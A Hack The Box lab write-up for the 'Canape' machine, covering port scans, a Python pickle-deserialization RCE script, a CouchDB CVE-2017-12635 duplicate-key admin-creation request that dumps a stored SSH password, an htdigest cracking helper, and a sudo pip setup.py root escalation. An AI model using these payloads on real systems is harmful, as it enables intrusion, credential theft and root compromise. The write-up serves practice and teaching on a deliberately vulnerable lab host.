Port scanning

┌──(mikannse㉿kali)-[~/HTB/canape]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.70
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 19:53 CST
Nmap scan report for canape.htb (10.10.10.70)
Host is up (0.073s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
65535/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 13.47 seconds
┌──(mikannse㉿kali)-[~/HTB/canape]
└─$ sudo nmap -sT -sV -sC -O -p80,65535 10.10.10.70
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 19:55 CST
Nmap scan report for canape.htb (10.10.10.70)
Host is up (0.064s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: Simpsons Fan Site
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-git:
| 10.10.10.70:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: final # Please enter the commit message for your changes. Li...
| Remotes:
|_ http://git.canape.htb/simpsons.git
65535/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:82:0b:31:90:e4:c8:85:b2:53:8b:a1:7c:3b:65:e1 (RSA)
| 256 22:fc:6e:c3:55:00:85:0f:24:bf:f5:79:6c:92:8b:68 (ECDSA)
|_ 256 0d:91:27:51:80:5e:2b:a3:81:0d:e9:d8:5c:9b:77:35 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X (95%), Crestron 2-Series (86%)
OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:crestron:2_series
Aggressive OS guesses: Linux 5.0 (95%), Linux 4.15 - 5.8 (90%), Linux 5.0 - 5.4 (90%), Linux 2.6.32 (89%), Linux 5.0 - 5.5 (88%), Linux 5.3 - 5.4 (88%), Crestron XPanel control system (86%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.92 seconds

Add canape.htb and git.canape.htb to /etc/hosts.

Pickle deserialization

The exposed .git directory can be dumped with a git dumper such as GitTools.

The repository at git.canape.htb can also be cloned directly; comparing the two, the contents are identical. __init__.py is the web application's source, so that is what to analyze.

The first thing that stands out is the cPickle.loads deserialization call; that is almost certainly the way in. Working backwards: cPickle loads a serialized object from a file under /tmp, and that file is written by the /submit route. So it is enough to craft the character and quote fields so that the serialized payload gets written to disk and then executed when it is loaded. character is filtered, but the check is loose rather than an exact match: a value such as "homer!" still satisfies the whitelist.

From there it is a matter of plugging in the standard pickle RCE template. While writing the payload I ran into Python 3 encoding problems, so I switched to Python 2; the target is also a Python 2 environment, which is why it has the cPickle module at all.

Start tcpdump listening for ICMP, run the payload, and the ping arrives; then swap the command for a reverse shell.

#!/usr/bin/env python2
import os
import cPickle
from hashlib import md5
import requests

class CommandExecute(object):
    # __reduce__ tells pickle to rebuild this object by calling
    # os.system("homer!;ping -c 1 10.10.14.11") at load time
    def __reduce__(self):
        return (os.system, ("homer!;ping -c 1 10.10.14.11",))

# Split the pickle stream at the '!' inside the command string: the left half
# contains "homer" and passes the character whitelist, and the server writes
# character + quote back to /tmp as one valid pickle stream.
character, quote = cPickle.dumps(CommandExecute()).split('!')
p_id = md5(character + quote).hexdigest()   # same file name the app derives
requests.post("http://canape.htb/submit", data={'character': character, 'quote': quote})
requests.post("http://canape.htb/check", data={'id': p_id})   # triggers cPickle load

There is also a .htpasswd in the /git directory, but it isn't clear yet what to do with it.

$ cat .htpasswd
homer:Git Access:7818cef8b9dc50f4a70fd299314cb9eb
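The user:realm:hash layout of that line is what Apache's htdigest writes rather than htpasswd: the third field is MD5("user:realm:password"), so it can be checked offline against candidate passwords. The checker below is an added example, not part of the write-up; the wordlist in it is constructed for illustration and the page gives no indication of what the real password is.

```python
#!/usr/bin/env python3
"""Offline check of an htdigest-style line (user:realm:MD5(user:realm:password))."""
import hashlib


def htdigest_ha1(user, realm, password):
    """HA1 exactly as htdigest stores it."""
    return hashlib.md5("{}:{}:{}".format(user, realm, password).encode()).hexdigest()


def parse_htdigest_line(line):
    """user and hash cannot contain ':'; the realm may contain spaces."""
    user, realm, ha1 = line.strip().split(":", 2)
    return user, realm, ha1.lower()


def crack_htdigest(line, candidates):
    """Return the first candidate whose HA1 matches the line, or None."""
    user, realm, ha1 = parse_htdigest_line(line)
    for pw in candidates:
        if htdigest_ha1(user, realm, pw) == ha1:
            return pw
    return None


# The line recovered from the box's .htpasswd
FOUND_LINE = "homer:Git Access:7818cef8b9dc50f4a70fd299314cb9eb"

if __name__ == "__main__":
    words = ["password", "simpsons", "doh", "homer"]   # constructed wordlist
    print(crack_htdigest(FOUND_LINE, words))
```

The same helper is a quick way to test whether a password recovered elsewhere on the box (for example from a database) is being reused for the Git realm, without guessing.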

CouchDB: CVE-2017-12635 / CVE-2017-12636

Recall that the application source connected to a CouchDB database; check it from the shell.

$ curl -X GET http://localhost:5984/
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 91 100 91 0 0 9100 0 --:--:-- --:--:-- --:--:-- 9100
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}

The version is 2.0.0, which is affected by CVE-2017-12635 (privilege escalation: the Erlang JSON parser used for storage keeps the first of two duplicate "roles" keys while the JavaScript validation function sees the last, so an unauthenticated PUT to _users can create an account that is stored with the _admin role) and its companion CVE-2017-12636 (remote code execution as the CouchDB service user once you are admin).

Following: https://www.anquanke.com/post/id/87256

$ curl -X PUT -d '{"type":"user","name":"mikannse","roles":["_admin"],"roles":[],"password":"123456"}' localhost:5984/_users/org.couchdb.user:mikannse -H "Content-Type:application/json"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 171 100 88 100 83 9777 9222 --:--:-- --:--:-- --:--:-- 19000
{"ok":true,"id":"org.couchdb.user:mikannse","rev":"1-195263f29c15ed60e1086654c5d633e6"}
$ curl -X GET -u mikannse:123456 http://localhost:5984/passwords/_all_docs
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 591 0 591 0 0 65666 0 --:--:-- --:--:-- --:--:-- 65666
{"total_rows":4,"offset":0,"rows":[
{"id":"739c5ebdf3f7a001bebb8fc4380019e4","key":"739c5ebdf3f7a001bebb8fc4380019e4","value":{"rev":"2-81cf17b971d9229c54be92eeee723296"}},
{"id":"739c5ebdf3f7a001bebb8fc43800368d","key":"739c5ebdf3f7a001bebb8fc43800368d","value":{"rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e"}},
{"id":"739c5ebdf3f7a001bebb8fc438003e5f","key":"739c5ebdf3f7a001bebb8fc438003e5f","value":{"rev":"1-77cd0af093b96943ecb42c2e5358fe61"}},
{"id":"739c5ebdf3f7a001bebb8fc438004738","key":"739c5ebdf3f7a001bebb8fc438004738","value":{"rev":"1-49a20010e64044ee7571b8c1b902cf8c"}}
]}
$ curl -X GET -u mikannse:123456 http://localhost:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 144 100 144 0 0 24000 0 --:--:-- --:--:-- --:--:-- 24000
{"_id":"739c5ebdf3f7a001bebb8fc4380019e4","_rev":"2-81cf17b971d9229c54be92eeee723296","item":"ssh","password":"0B4jyA0xtytZi7esBNGp","user":""}
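The PUT above works because two JSON parsers disagree about a duplicated key. The model below reproduces that differential in Python: json.loads keeps the last duplicate (what CouchDB's JavaScript validate_doc_update saw, roles = []), while an object_pairs_hook that keeps the first duplicate behaves like the Erlang parser that stored the document (roles = ["_admin"]). This is an added example, not CouchDB's code: validate_user_doc is a simplified stand-in for the _users design-document rule, and simulate_put_consistent shows the general fix (one parse shared by validation and storage) rather than the exact patch CouchDB shipped.

```python
#!/usr/bin/env python3
"""CVE-2017-12635 in miniature: one document, two parser views (model only)."""
import json
from collections import OrderedDict


def build_admin_user_doc(name, password):
    """Body of the PUT to /_users/org.couchdb.user:<name> used on the box.
    Built as a string because a Python dict cannot hold duplicate keys."""
    return ('{"type":"user","name":"%s","roles":["_admin"],"roles":[],'
            '"password":"%s"}' % (name, password))


def first_key_wins(pairs):
    """object_pairs_hook keeping the first value of a duplicated key
    (models the Erlang-side parser that persisted the document)."""
    out = OrderedDict()
    for key, value in pairs:
        out.setdefault(key, value)
    return out


def parse_like_validator(doc):
    """json.loads keeps the last duplicate, like JSON.parse in the JS validator."""
    return json.loads(doc)


def parse_like_storage(doc):
    return json.loads(doc, object_pairs_hook=first_key_wins)


def validate_user_doc(new_doc, requesting_user_roles):
    """Simplified _users rule: only an admin may write a doc granting _admin."""
    if "_admin" in new_doc.get("roles", []) and "_admin" not in requesting_user_roles:
        raise PermissionError("Only _admin may set _admin roles")
    return True


def simulate_put(doc, requesting_user_roles=()):
    """Vulnerable flow: validation sees one view, storage keeps another.
    Returns the roles that end up persisted."""
    validate_user_doc(parse_like_validator(doc), requesting_user_roles)
    return parse_like_storage(doc)["roles"]


def simulate_put_consistent(doc, requesting_user_roles=()):
    """Fixed flow: the same parsed object is validated and stored, so the
    duplicate-key trick is caught. Returns None when rejected."""
    parsed = parse_like_storage(doc)
    try:
        validate_user_doc(parsed, requesting_user_roles)
    except PermissionError:
        return None
    return parsed["roles"]


def roles_after_put(name="mikannse", password="123456"):
    """Unauthenticated PUT against the vulnerable model."""
    return simulate_put(build_admin_user_doc(name, password), requesting_user_roles=())


if __name__ == "__main__":
    doc = build_admin_user_doc("mikannse", "123456")
    print("validator sees roles:", parse_like_validator(doc)["roles"])
    print("storage keeps roles:", parse_like_storage(doc)["roles"])
    print("persisted by vulnerable flow:", roles_after_put())
    print("persisted by consistent flow:", simulate_put_consistent(doc))
```

The order of the two "roles" keys in the request is not cosmetic: ["_admin"] must come first so the storage parser keeps it, and [] last so the validator sees an empty role list.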

That is homer's SSH password (the record's user field is empty, but it works for homer). Log in over SSH, remembering that sshd is on port 65535 rather than 22.

It should also be possible to get homer's privileges directly through the CVE-2017-12636 RCE, since CouchDB runs as homer: https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/README.zh-cn.md

Privilege escalation

homer@canape:~$ sudo -l
[sudo] password for homer:
Matching Defaults entries for homer on canape:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User homer may run the following commands on canape:
(root) /usr/bin/pip install *

GTFOBins has this one ready: pip executes the package's setup.py during install, and under sudo that code runs as root.

homer@canape:/tmp$ TF=$(mktemp -d)
homer@canape:/tmp$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
homer@canape:/tmp$ sudo pip install $TF
Processing ./tmp.5zPXio0xgA
# whoami
root

Closing thoughts

I happen to be watching The Simpsons lately, so this one felt very immersive, haha. It is also a high-quality box: the pickle deserialization and the CouchDB privilege escalation are both things I had run into before, but it was still well worth practising them once more.